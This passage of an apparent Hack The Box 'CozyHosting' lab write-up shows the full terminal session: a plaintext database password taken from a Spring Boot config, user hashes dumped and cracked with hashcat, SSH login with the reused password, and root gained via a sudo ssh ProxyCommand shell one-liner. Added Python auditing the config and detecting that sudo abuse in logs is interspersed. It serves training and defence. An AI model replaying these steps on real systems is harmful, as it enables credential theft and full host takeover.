inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.esm.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap/js/bootstrap.min.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/plyr.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/plyr.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/glightbox.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/css/glightbox.min.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/glightbox.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/glightbox/js/glightbox.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.scss
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/bootstrap-icons.woff2
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/fonts/bootstrap-icons.woff
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/bootstrap-icons/bootstrap-icons.json
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.woff2
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.eot
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.ttf
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.woff
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/php-email-form/validate.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/purecounter_vanilla.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/purecounter/purecounter_vanilla.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/dataTool.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/extension/bmap.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.common.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.js.map
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.simple.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/echarts/echarts.esm.min.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/aos.css
inflating: /tmp/cloudhosting/BOOT-INF/classes/static/assets/vendor/aos/aos.js
inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/index.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/admin.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/templates/login.html
inflating: /tmp/cloudhosting/BOOT-INF/classes/application.properties
inflating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.xml
inflating: /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
creating: /tmp/cloudhosting/BOOT-INF/lib/
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-session-core-3.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-jcl-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-autoconfigure-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/logback-classic-1.4.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/logback-core-1.4.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/log4j-to-slf4j-2.19.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/log4j-api-2.19.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jul-to-slf4j-2.0.6.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.annotation-api-2.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/snakeyaml-1.33.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-actuator-autoconfigure-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-actuator-3.0.2.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-databind-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-annotations-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-core-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-datatype-jsr310-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-observation-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-commons-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/micrometer-core-1.10.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/HdrHistogram-2.1.12.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/LatencyUtils-2.0.3.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-aop-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-beans-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-config-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-context-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-web-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-expression-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-spring6-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/attoparser-2.0.6.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/unbescape-1.1.6.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-datatype-jdk8-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jackson-module-parameter-names-2.14.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-core-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-el-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/tomcat-embed-websocket-10.1.5.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-web-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-webmvc-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/thymeleaf-extras-springsecurity6-3.1.1.RELEASE.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/slf4j-api-2.0.6.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/aspectjweaver-1.9.19.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/HikariCP-5.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-jdbc-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/hibernate-core-6.1.6.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.persistence-api-3.1.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.transaction-api-2.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jboss-logging-3.5.0.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/hibernate-commons-annotations-6.0.2.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jandex-2.4.2.Final.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/classmate-1.5.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/byte-buddy-1.12.22.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jaxb-runtime-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jaxb-core-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/angus-activation-1.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/txw2-4.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/istack-commons-runtime-4.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.inject-api-2.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/antlr4-runtime-4.10.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-data-jpa-3.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-data-commons-3.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-orm-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-tx-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-aspects-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/lombok-1.18.26.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/postgresql-42.5.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/checker-qual-3.5.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.xml.bind-api-4.0.0.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/jakarta.activation-api-2.1.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-core-6.0.4.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-core-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-security-crypto-6.0.1.jar
extracting: /tmp/cloudhosting/BOOT-INF/lib/spring-boot-jarmode-layertools-3.0.2.jar
inflating: /tmp/cloudhosting/BOOT-INF/classpath.idx
inflating: /tmp/cloudhosting/BOOT-INF/layers.idx
Find all files: *.properties
app@cozyhosting:/app$ find /tmp/cloudhosting -name "*.properties" 2>/dev/null
/tmp/cloudhosting/BOOT-INF/classes/application.properties
/tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
Read all files: *.properties
Found interesting info
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
app@cozyhosting:/app$
---
app@cozyhosting:/app$ cat /tmp/cloudhosting/BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
app@cozyhosting:/app$
app@cozyhosting:/app$ cat /tmp/cloudhosting/META-INF/maven/htb.cloudhosting/cloudhosting/pom.properties
artifactId=cloudhosting
groupId=htb.cloudhosting
version=0.0.1
app@cozyhosting:/app$
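The application.properties above is what turned the actuator into an information leak: `sessions`, `env`, `beans` and `mappings` are exposed over HTTP and the datasource password sits in the file as a literal. Added example (not the writeup's or the application's own code): a small audit for such a file and the hardened counterpart; the property text is constructed from the values above with the real password replaced by a placeholder.

```python
# Audit a Spring Boot application.properties for what made CozyHosting's actuator a leak.
# Added example (not the writeup's or the application's own code).
import re

# Actuator endpoints whose exposure over HTTP leaks configuration, secrets or session ids
SENSITIVE_ENDPOINTS = {"env", "beans", "sessions", "mappings", "configprops", "heapdump"}
SECRET_KEY = re.compile(r"(password|secret|token)$", re.I)

# Constructed from the file dumped above; the real password is replaced by a placeholder
SAMPLE = """\
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=PLACEHOLDER_PASSWORD
"""

def parse_properties(text):
    """Minimal key=value parser; comments and blank lines are skipped."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", "!")):
            key, _, value = line.partition("=")
            props[key.strip()] = value.strip()
    return props

def audit(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    props, findings = parse_properties(text), []
    include = props.get("management.endpoints.web.exposure.include", "")
    exposed = {e.strip() for e in include.split(",")}
    for ep in sorted(exposed & SENSITIVE_ENDPOINTS):
        findings.append(f"actuator: sensitive endpoint '{ep}' is exposed over HTTP")
    for key, value in props.items():
        if SECRET_KEY.search(key) and value and not value.startswith("${"):
            findings.append(f"secret: '{key}' is a literal; inject it via ${{ENV_VAR}} or a vault")
    return findings

def harden(text):
    """Corrected file: only 'health' stays exposed, secrets come from the environment."""
    out = []
    for line in text.splitlines():
        key, sep, _ = line.partition("=")
        key = key.strip()
        if key == "management.endpoints.web.exposure.include":
            out.append(f"{key}=health")
        elif sep and SECRET_KEY.search(key):
            out.append(f"{key}=${{{key.upper().replace('.', '_').replace('-', '_')}}}")
        else:
            out.append(line)
    return "\n".join(out) + "\n"
```

Note that `server.address=127.0.0.1` does not help here: nginx on port 80 forwards to the Java process on 127.0.0.1:8080, so every exposed actuator endpoint is reachable from the network anyway.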
Get creds from the postgres database (listening on 127.0.0.1:5432 only)
app@cozyhosting:/app$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 244 127.0.0.1:5432 0.0.0.0:*
tcp LISTEN 0 100 [::ffff:127.0.0.1]:8080 *:* users:(("java",pid=1060,fd=19))
tcp LISTEN 0 128 [::]:22 [::]:*
app@cozyhosting:/app$
app@cozyhosting:/app$ psql -h 127.0.0.1 -U postgres
Password for user postgres: Vg&nvzAQ7XxR
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=# \list
                                  List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)
postgres=#
postgres=# \connect cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \dt
        List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)
cozyhosting=#
cozyhosting=# select * from users;
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
Cracking hash for user: admin
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
Analyzing '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ hashcat -m 3200 admin.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-Intel(R) Core(TM) i7-8850H CPU @ 2.60GHz, 4295/8654 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib...kVO8dm
Time.Started.....: Sat Aug 10 21:49:55 2024 (2 mins, 36 secs)
Time.Estimated...: Sat Aug 10 21:52:31 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18 H/s (5.57ms) @ Accel:2 Loops:32 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2796/14344384 (0.02%)
Rejected.........: 0/2796 (0.00%)
Restore.Point....: 2792/14344384 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:992-1024
Candidate.Engine.: Device Generator
Candidates.#1....: andrea1 -> charley
Hardware.Mon.#1..: Util: 0%
Started: Sat Aug 10 21:49:13 2024
Stopped: Sat Aug 10 21:52:34 2024
SSH login as: josh (the cracked admin password is reused for the local account)
L: josh
P: manchesterunited
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_CozyHosting]
└─$ ssh josh@10.10.11.230
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Aug 10 09:56:59 PM UTC 2024
System load: 0.376953125
Usage of /: 53.7% of 5.42GB
Memory usage: 12%
Swap usage: 0%
Processes: 265
Users logged in: 0
IPv4 address for eth0: 10.10.11.230
IPv6 address for eth0: dead:beef::250:56ff:fe94:cbf
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$
Read flag: user.txt
josh@cozyhosting:~$ find / -name "user.txt" 2>/dev/null
/home/josh/user.txt
josh@cozyhosting:~$
josh@cozyhosting:~$ cd /home/josh
josh@cozyhosting:~$
josh@cozyhosting:~$ ls -la
total 36
drwxr-x--- 3 josh josh 4096 Aug 8 2023 .
drwxr-xr-x 3 root root 4096 May 18 2023 ..
lrwxrwxrwx 1 root root 9 May 11 2023 .bash_history -> /dev/null
-rw-r--r-- 1 josh josh 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 josh josh 3771 Jan 6 2022 .bashrc
drwx------ 2 josh josh 4096 May 18 2023 .cache
-rw------- 1 josh josh 20 May 18 2023 .lesshst
-rw-r--r-- 1 josh josh 807 Jan 6 2022 .profile
lrwxrwxrwx 1 root root 9 May 21 2023 .psql_history -> /dev/null
-rw-r----- 1 root josh 33 Aug 10 21:55 user.txt
-rw-r--r-- 1 josh josh 39 Aug 8 2023 .vimrc
josh@cozyhosting:~$ cat user.txt ; id ; ip a
6d173ef50d9e25615bcb0e866f4d5413
uid=1003(josh) gid=1003(josh) groups=1003(josh)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:0c:bf brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.230/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:cbf/64 scope global dynamic mngtmpaddr
valid_lft 86392sec preferred_lft 14392sec
inet6 fe80::250:56ff:fe94:cbf/64 scope link
valid_lft forever preferred_lft forever
josh@cozyhosting:~$
Privilege Escalation
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
josh@cozyhosting:~$
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
#
# id
uid=0(root) gid=0(root) groups=0(root)
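The sudo rule `(root) /usr/bin/ssh *` cannot be made safe with a wildcard, because ssh's own options let the client run a local command; the fix is to drop the rule. Until then, sudo's log entries are the detection point. Added example (not from the writeup): a check over auth.log-style sudo entries that flags sudo-elevated ssh invocations carrying `-o` overrides, with the ProxyCommand case above as the high-severity one; the log lines are constructed to mirror this session and assume sudo's default `COMMAND=` syslog layout.

```python
# Flag sudo-elevated ssh invocations that override client options (the ProxyCommand
# trick above) in auth.log-style sudo entries. Added example, not from the writeup.
import re

SUDO_ENTRY = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
SSH_CMD = re.compile(r"^(?:/usr/bin/)?ssh(?:\s|$)")
PROXY_OPT = re.compile(r"(?:^|\s)-o\s*ProxyCommand", re.I)   # ssh runs this as a local command
ANY_OPT = re.compile(r"(?:^|\s)-o\s*\S")                      # any other -o override

# Constructed lines mirroring the session on this page (timestamps are made up)
SAMPLE_LOG = """\
Aug 10 22:01:03 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh -o ProxyCommand=;sh 0<&2 1>&2 x
Aug 10 22:03:10 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh backup@10.0.0.5
Aug 10 22:04:21 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/ssh -o StrictHostKeyChecking=no backup@10.0.0.5
Aug 10 22:05:44 cozyhosting sudo:     josh : TTY=pts/0 ; PWD=/home/josh ; USER=root ; COMMAND=/usr/bin/cat /etc/hostname
"""

def classify(cmd):
    """Severity of one sudo COMMAND string, or None when it is not an ssh invocation."""
    if not SSH_CMD.match(cmd):
        return None
    if PROXY_OPT.search(cmd):
        return "high"     # the ProxyCommand string executes with the target user's privileges
    if ANY_OPT.search(cmd):
        return "medium"   # other client-side overrides; review what they change
    return "low"

def risky_sudo_ssh(log_text):
    """Return (user, target, severity, cmd) for sudo ssh invocations rated above 'low'."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_ENTRY.search(line)
        if not m:
            continue
        sev = classify(m["cmd"])
        if sev in ("high", "medium"):
            hits.append((m["user"], m["target"], sev, m["cmd"]))
    return hits
```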
Read flag: root.txt
# cd /root
#
# ls -la
total 40
drwx------ 5 root root 4096 Aug 10 21:55 .
drwxr-xr-x 19 root root 4096 Aug 14 2023 ..
lrwxrwxrwx 1 root root 9 May 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Aug 8 2023 .cache
-rw------- 1 root root 56 Aug 14 2023 .lesshst
drwxr-xr-x 3 root root 4096 May 11 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
lrwxrwxrwx 1 root root 9 May 18 2023 .psql_history -> /dev/null
-rw-r----- 1 root root 33 Aug 10 21:55 root.txt
drwx------ 2 root root 4096 May 9 2023 .ssh
-rw-r--r-- 1 root root 39 Aug 8 2023 .vimrc
#
# cat root.txt ; id ; ip a
0096e75f6864d7eaf5dad4c06ea52ec9
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:0c:bf brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.230/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:cbf/64 scope global dynamic mngtmpaddr
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::250:56ff:fe94:cbf/64 scope link
valid_lft forever preferred_lft forever
#
References
[GTFOBins - SSH](https://gtfobins.github.io/gtfobins/ssh/#sudo)
Lessons Learned